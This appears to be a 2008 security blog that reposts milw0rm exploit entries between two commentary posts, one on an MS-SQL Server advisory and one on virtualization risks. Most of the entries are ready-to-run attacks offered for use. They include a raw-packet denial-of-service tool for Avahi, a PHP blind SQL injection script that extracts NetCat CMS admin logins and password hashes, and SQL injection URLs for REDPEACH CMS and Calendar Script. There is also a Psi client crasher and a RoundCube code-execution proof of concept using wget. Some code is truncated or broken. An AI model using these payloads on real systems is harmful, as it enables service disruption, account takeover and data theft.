h4xx0rs

Microsoft Warns of Serious MS-SQL 2000 & 2005 Vulnerability

x9169 — Wed, 24 Dec 2008 09:48:50 +0000

Another big flaw has been discovered in Microsoft software just a few days after they broke their patch cycle to issue a patch for the IE bug that allowed remote code execution.

This time however it doesn’t really effect home users or the general consumer, it’s a more specific server side vulnerability affecting Microsoft SQL Server 2000 and 2005 versions. It seems pretty serious though as it also appears that this vulnerability if exploited properly could lead to remote code execution.

Just days after patching a critical flaw in its Internet Explorer browser, Microsoft is now warning users of a serious bug in its SQL Server database software. Microsoft issued a security advisory late Monday, saying that the bug could be exploited to run unauthorized software on systems running versions of Microsoft SQL Server 2000 and SQL Server 2005.

Attack code that exploits the bug has been published, but Microsoft said that it has not yet seen this code used in online attacks. Database servers could be attacked using this flaw if the criminals somehow found a way to log onto the system, and Web applications that suffered from relatively common SQL injection bugs could be used as stepping stones to attack the back-end database, Microsoft said.

Desktop users running the Microsoft SQL Server 2000 Desktop Engine or SQL Server 2005 Express could be at risk in some circumstances, Microsoft said.

Again I wonder how far behind the curve Microsoft is with this? Usually these kind of bugs have been discovered by the more malicious parties way before Microsoft has any idea that their software is vulnerable.

It claims that the code hasn’t been used in online attacks, but honestly if it was used well by a smart party who would even know? SQL injection could lead to this attack being executed and the code is published online so I find it unlikely that it hasn’t been used.

The bug lies in a stored procedure called “sp_replwritetovarbin,” which is used by Microsoft’s software when it replicates database transactions. It was publicly disclosed on December 9 by SEC Consult Vulnerability Lab, which said it had notified Microsoft of the issue in April.

“Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue,” Microsoft said in its advisory.

This is the third serious bug in Microsoft’s software to be disclosed in the past month, but it is unlikely to be used in widespread attacks, according to Marc Maiffret, director of professional services, with The DigiTrust Group, a security consulting firm. “It is rather low risk given other vulnerabilities that exist,” he said via instant message. “There are a lot of better ways to currently compromise windows systems.”

The bug was discovered by someone in April this year, so that’s at least 7 months someone has known about it..but only know when the vendor discloses it then Microsoft chooses to say something about it.

It is a fairly low risk vulnerability due to the requirements needed to execute it effectively, but still it’s another chink in the Microsoft armour to add to the (long long) list.

Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit

x9169 — Wed, 24 Dec 2008 09:33:51 +0000

/*
 * cve-2008-5081.c
 *
 * Avahi mDNS Daemon Remote DoS < 0.6.24
 * Jon Oberheide 
 * http://jon.oberheide.org
 *
 * Usage:
 *
 *   gcc cve-2008-5081.c -ldnet -o cve-2008-5081
 *   ./cve-2008-5081 1.2.3.4
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081
 *
 *   Crafted mDNS packet with source port 0 can cause avahi-daemon
 *   to abort() due to failed assertion assert(port > 0); in
 *   originates_from_local_legacy_unicast_socket() function in
 *   avahi-core/server.c.
 *
 */

#include 
#include 
#include 
#include 

int
main(int argc, char **argv)
{
    ip_t *sock;
    intf_t *intf;
    struct addr dst;
    struct ip_hdr *ip;
    struct udp_hdr *udp;
    struct intf_entry entry;
    int len = IP_HDR_LEN + UDP_HDR_LEN;
    char buf[len];

    if (argc < 2 || addr_aton(argv[1], &dst)) {
        printf("error: please specify a target ip address\n");
        return 1;
    }

    memset(buf, 0, sizeof(buf));

    ip = (struct ip_hdr *) buf;
    ip->ip_v = 4;
    ip->ip_hl = 5;
    ip->ip_tos = 0;
    ip->ip_off = 0;
    ip->ip_sum = 0;
    ip->ip_ttl = IP_TTL_MAX;
    ip->ip_p = IP_PROTO_UDP;
    ip->ip_id = htons(0xdead);
    ip->ip_len = htons(len);

    udp = (struct udp_hdr *) (buf + IP_HDR_LEN);

    udp->uh_sum = 0;
    udp->uh_sport = htons(0);
    udp->uh_dport = htons(5353);
    udp->uh_ulen = htons(UDP_HDR_LEN);

    intf = intf_open();
    intf_get_dst(intf, &entry, &dst);
    intf_close(intf);

    ip->ip_src = entry.intf_addr.addr_ip;
    ip->ip_dst = dst.addr_ip;
    ip_checksum(buf, len);

    sock = ip_open();
    if (!sock) {
        printf("error: root privileges needed for raw socket\n");
        return 1;
    }
    ip_send(sock, buf, len);
    ip_close(sock);

    return 0;
}

// milw0rm.com [2008-12-19]

CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit

x9169 — Wed, 24 Dec 2008 09:32:41 +0000



	[+] Brute 42 symbol...
	.....................................
	[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9

	[+] Exploiting is finished successfully
	[+] Login - admin
	[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
	[+] Decrypt MySQL hash and login into NetCat CMS.

*/

function http_connect($query)
{

	global $server;

	$headers = array(
	    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
	    'Referer' => $server
	);

	$res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET);
	$res_http->addHeaders($headers);

	try {
		$response = $res_http->send()->getBody();

		if (eregi("page_header", $response))
		{
			return 1;
		}
		else
		{
			return 0;
		}

	} catch (HttpException $exception) {

		print "[-] Not connected";
		exit(0);

	}

}

function brute($User_id,$table)
{
	$ret_str = "";

	for ($i=1;$i<43;$i++)
	{
		print "[+] Brute $i symbol...\n";

		for ($j=42;$j<123;$j++)
		{
			$q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*";

			if (http_connect($q))
			{
				$ret_str=$ret_str.chr($j);
				print chr($j)."\n";
				break;
			}
			print ".";

			if ($j == 57) $j = 96;
			if ($j == 42) $j = 47;

		}

		if ($j == 123) break;
	}

	return $ret_str;
}

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -s=NetCat_server -u=User_ID

The options are required:
 -u The user identifier (number in table)
 -s Target for exploiting

example:

# ./".$script_name." -s=http://localhost/netcat/ -u=1
[+] Phase 1 brute login.
[+] Brute 1 symbol...
..1
[+] Brute 2 symbol...
.....................................
[+] Phase 1 successfully finished: 1
[+] Phase 2 brute password-hash.
[+] Brute 1 symbol...
.....................................
[+] Phase 2 successfully finished:

[+] Exploiting is finished successfully
[+] Login - 1
[+] MySQL hash -
[+] You can login into NetCat CMS with the empty password
";
}

function successfully($login,$hash)
{
print "

[+] Exploiting is finished successfully
[+] Login - $login
[+] MySQL hash - $hash
";

if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
else print "[+] You can login into NetCat CMS with the empty password\n";

}

if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
	help_argc($argv[0]);
	exit(0);
}
else
{
	$ARG = array();
	foreach ($argv as $arg) {
		if (strpos($arg, '-') === 0) {
			$key = substr($arg,1,1);
			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
		}
	}

	if ($ARG[s] && $ARG[u])
	{
		$server = $ARG[s];
		$User_id = intval($ARG[u]);
		$User_id--;

		print "[+] Phase 1 brute login.\n";
		$login = brute($User_id,"Login");
		print "\n[+] Phase 1 successfully finished: $login\n";

		print "[+] Phase 2 brute password-hash.\n";
		$hash = brute($User_id,"Password");
		print "\n[+] Phase 2 successfully finished: $hash\n";

		successfully($login,$hash);
	}
	else
	{
		help_argc($argv[0]);
		exit(0);
	}

}

?> 

# milw0rm.com [2008-12-23]

REDPEACH CMS (zv) Remote SQL Injection Vulnerability

x9169 — Wed, 24 Dec 2008 09:31:50 +0000

###############################################################
#
#           REDPEACH CMS - SQL Injection Vulnerability
#	    http://www.redpeach.de/
#
#      Vulnerability discovered by: Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, karamble, Free-Hack
#      Date:                        23.12.2008
#
###############################################################
#
#      Admin Panel: [Target]/admin/login.php
#      Description: The Files "index.php" and "page.php" contain
#		    vulnerable SQL Querys at the GET Parameter "zv".
#		    In the most cases you need a table prefix, which
#		    is similar to the websites' name, so you can guess.
#		    After table prefix there's "_user".
#		    The important column names are "username" and "password".
#		    The number of columns is 8 almost everytime.
#
#      Example:     http://www.website.com/page.php?pageid=1&zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1/*
#
###############################################################

# milw0rm.com [2008-12-22]

Calendar Script 1.1 (Auth Bypass) SQL Injection Vulnerability

x9169 — Wed, 24 Dec 2008 09:30:56 +0000

 -----------------------------------------------------
 Calendar Script v1.1 Admin Login Bypass Vulnerability
 -----------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1

 File Vuln "index.php" (code details)

 ------------------------------------------------------------

 4.  $action = $_POST['action'];
 5.
 6.  switch($action) {
 7.  case 'login':
 8.  // login
 9.  $username = stripslashes(trim($_POST['username']));
 10. $password = sha1(stripslashes(trim($_POST['password'])));
 11.
 12. if(empty($username) || empty($password)) {
 13. // Stop, someone tried entering nothing into here
 14. // Show an error.
 15. $loginMsg = 'You must enter a username and password';
 16. } else {
 17. // The input seems to be ok, check it against the database.
 18. $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn);

 ------------------------------------------------------------

 Exploit

 http://[host]/[path]/index.php

 (Login) Username: ' or 1=1# & Password: anything

 ------------------------------------------------------------

 Fix: $username = mysql_real_escape_string($_POST['username']);

 Note: works regardless php.ini settings (str0ke =D)
       don't add me on msn messenger

 ------------------------------------------------------------

# milw0rm.com [2008-12-22]

Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)

x9169 — Tue, 23 Dec 2008 23:02:28 +0000

#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close() 

# milw0rm.com [2008-12-23]

Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit

x9169 — Tue, 23 Dec 2008 23:01:40 +0000

#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 \n\n";

}

$head = "" . "\n" . "" . "\n" . "";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;

# milw0rm.com [2008-12-23]

Virtualization Security – IT Managers and Security Experts Disagree

x9169 — Tue, 23 Dec 2008 23:00:19 +0000

A lot of companies are moving towards virtualization, blade servers and sharing hardware components makes sense when you can have multiple logical servers on one physical machine. I’ve used VMWare in a few situations myself but mostly I don’t see a real requirement for using virtual machines (apart from hosting with a VPS).

There have always been debates about the security, it’s harder to segregate as the virtual machines are somehow attached at the system level so if you can break out of the ‘jail’ (into the ‘hypervisor’) you can effectively access everything on that physical server. There is still a lot of skepticism about the security of virtual servers and the big 3 providers (VMWare, Citrix Xen and Microsoft) are apparently working on some new security solutions, but as they haven’t been released yet you better be careful.

Does transitioning to virtualization increase security risks within a company? IT managers appear to be at loggerheads with IT security professionals over that question, even while sharing similar opinions on where risks might lie, according to a new survey.

The 2009 Security Mega Trends Survey from research firm Ponemon Institute — which also looked at attitudes on other topics, such as outsourcing and Web 2.0 technologies — shows roughly two-thirds of IT operations staff who responded said they felt virtualization of computer resources did not increase information-security risks. But about two-thirds of information security professionals surveyed felt the opposite way.

A full three-quarters of the survey’s 1,402 respondents, all active in U.S.-based private sector firms or government agencies, said their organizations had already implemented virtualization of their computer resources, with about 90% in both the IT and security camps saying they were “familiar” or “very familiar” with virtualization

It’s strange to see the opinions are almost polarized and exactly opposite, 2/3s of managers think that virtualization does not increase risk but 2/3s of security pros think that it does. I’d personally have to say it does increase risk, especially at the moment where it’s still quite a new technology and the implementation and security measures are not mature yet.

Stay away from virtualization for extremely data critical operations.

The survey reflects the often upbeat attitudes about virtualization expressed by experienced IT pros about how the technology, most commonly that of VMware, Microsoft of Citrix Xen, is bringing them the benefit of server consolidation.

“We started virtualization in a development and test environment, and now the main applications we have using VMware in production instances are file and print servers,” says Rich Wagner, director of IT infrastructure at Columbus, Ohio-based Hexion Specialty Chemicals. Wagner says virtualization hasn’t raised red flags as far as security requirements. The main concern, he says, is “from a performance standpoint — the CPU and memory and disk I/O — in sharing a large box,” with database servers seen as a resource-intensive application that might not be well-suited for virtualization.

There’s a far more skeptical view of virtualization security often expressed by seasoned IT security pros, who harbor doubts that vendors on the virtualization front have really sorted out or addressed the risks associated with the underlying hypervisor transformation.

I agree it’s definitely best for a testing/staging situation where you can set up multiple different environments concurrently on the same piece of hardware without having to reboot.

It’s great in a development environment too if you need to test a piece of code on multiple operating systems with different specifications.

But as I said above, for CPU intensive activities and for servers that hold critical data I just don’t think it’s a good idea.

RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability

x9169 — Tue, 23 Dec 2008 22:56:36 +0000

Public Release Date of POC: 2008-12-22
Author: Jacobo Avariento Gimeno (Sofistic)
CVE id: CVE-2008-5619
Bugtraq id: 32799
Severity: Critical
Vulnerability reported by: RealMurphy

Intro
----
Roundcube Webmail is a browser-based IMAP client that uses
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text, this library uses the preg_replace PHP
function in an insecure manner.

Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta
Round Cube RoundCube Webmail 0.2-1 alpha (tested)

Analysis of the vulnerable code
----
The script bin/html2text.php creates an instance of the class html2text
with the given POST data, the problem arises in the file
program/lib/html2text.php in function _convert() on line 381:

        // Run our defined search-and-replace
        $text = preg_replace($this->search, $this->replace, $text);

Some patterns in $this->search allow interpret PHP code using the "e"
flag, i.e.:
'/]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // 
'/]*>(.+?)<\/b>/ie',                // 
'/]*>(.+?)<\/th>/ie',              //  and 

In concrete those would be replaced by:
'$this->_build_link_list("\\2", "\\3")', // 
'strtoupper("\\1")',                    // 
"strtoupper(\"\t\t\\1\n\")",            //  and 

Now using PHP complex (curly) syntax we can take advantage of this to
interpret arbitrary PHP code, evaluating PHP code embedded inside
strings.

Proof of Concept
----
As this vulnerability was discovered in-the-wild:
http://trac.roundcube.net/ticket/1485618 was quite sure that would be
exploitable, using PHP curly we can execute phpinfo():

wget -q --header="Content-Type: ''" \
-O - --post-data='{${phpinfo()}}' \
--no-check-certificate \
http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php

Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc
to avoid using single or double quotes the arbitrary shell command
execution is fully feasible. As this vulnerability was discovered last
week no more details will be published yet, more info will be available
at http://sofistic.net.

-- Jacobo Avariento Gimeno IT Security Department @ Sofistic Your security, our concern! http://sofistic.net 

# milw0rm.com [2008-12-22]